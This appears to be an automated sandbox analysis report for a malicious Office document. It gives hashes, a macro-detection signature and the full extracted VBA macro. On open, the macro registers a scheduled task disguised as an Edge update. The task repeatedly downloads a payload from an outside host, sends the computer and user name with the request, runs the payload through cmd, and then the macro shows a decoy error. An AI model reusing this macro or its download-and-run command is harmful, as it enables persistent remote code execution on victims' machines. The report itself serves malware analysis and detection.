Behavioral task
behavioral1
Sample
0b230b83c0b4af6e13ad837c35121d0827f5a243855a5d8a80e299b9c91ad5ae.doc
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
0b230b83c0b4af6e13ad837c35121d0827f5a243855a5d8a80e299b9c91ad5ae.doc
Resource
win10v2004-20240508-en
General
-
Target
0b230b83c0b4af6e13ad837c35121d0827f5a243855a5d8a80e299b9c91ad5ae
-
Size
429KB
-
MD5
2add40a089dad67f2edb6177cd294b88
-
SHA1
b4fd0de1f29a8d069eb77ab7941d4de925a4c5b7
-
SHA256
0b230b83c0b4af6e13ad837c35121d0827f5a243855a5d8a80e299b9c91ad5ae
-
SHA512
b7dadc5c45741ef4f6b63eee1ed62c088c3064dd78ea0d5149760e98e17416416d9b3f3b39c8eade34d43e1aecdb76f7d2c84c8d4e43a564e77e53d5ad27ec09
-
SSDEEP
12288:9tY2RRrgcpOeAvY+cX98Z11oOH0PNiUBpvdh:9tYeg1eJLX7EUBpvT
Malware Config
Signatures
-
Office macro that triggers on suspicious action 1 IoCs
Office document macro which triggers in special circumstances - often malicious.
resource yara_rule sample office_macro_on_action -
resource sample
Files
-
0b230b83c0b4af6e13ad837c35121d0827f5a243855a5d8a80e299b9c91ad5ae.doc windows office2003
ThisDocument
1Attribute VB_Name = "ThisDocument"2Attribute VB_Base = "0{09FD2EFF-5669-11D3-B65F-00C04F8EF32D}"3Attribute VB_GlobalNameSpace = False4Attribute VB_Creatable = False5Attribute VB_PredeclaredId = True6Attribute VB_Exposed = True7Attribute VB_TemplateDerived = False8Attribute VB_Customizable = True9Private Sub Document_Open()10Set objTaskService = CreateObject("Schedule.Service")11objTaskService.Connect12Set objRootFolder = objTaskService.GetFolder("\")13Set objTaskDefinition = objTaskService.NewTask(0)14Set objTrigger = objTaskDefinition.Triggers.Create(1)15objTrigger.StartBoundary = "2023-01-01T00:00:00"16objTrigger.Repetition.Interval = "PT18M"17objTrigger.Enabled = True18Set objAction = objTaskDefinition.Actions.Create(0)19objAction.Path = "conhost.exe"20objAction.Arguments = "--headless cmd /c ""curl -o C:\ProgramData\mki.rr https://mariasunistyle.com/ysc.php?vc=%computername%SS%username% & more C:\ProgramData\mki.rr|cmd"""21objRootFolder.RegisterTaskDefinition "MicrosoftEdgeEssentialUpdates", objTaskDefinition, 6, , , 322ClearDocumentContent23End Sub24Sub ClearDocumentContent()25Dim pubApp As Object26Dim pubDoc As Object27Dim shape As Object2829' Initialize Publisher application30On Error Resume Next31Set pubApp = GetObject(, "Publisher.Application")32If pubApp Is Nothing Then33Set pubApp = CreateObject("Publisher.Application")34pubApp.Visible = True ' Set to True if you want to see the Publisher window35End If36On Error GoTo 03738' Check if a document is open39If pubApp.Documents.Count > 0 Then40Set pubDoc = pubApp.ActiveDocument4142' Loop through each shape in the document and delete it43For Each shape In pubDoc.Pages(1).Shapes44shape.Delete45Next shape46MsgBox "Unsupported Version of Microsoft Office", vbInformation47' Save and close the Publisher document48End If4950' Clean up51Set pubDoc = Nothing52Set pubApp = Nothing53End Sub5455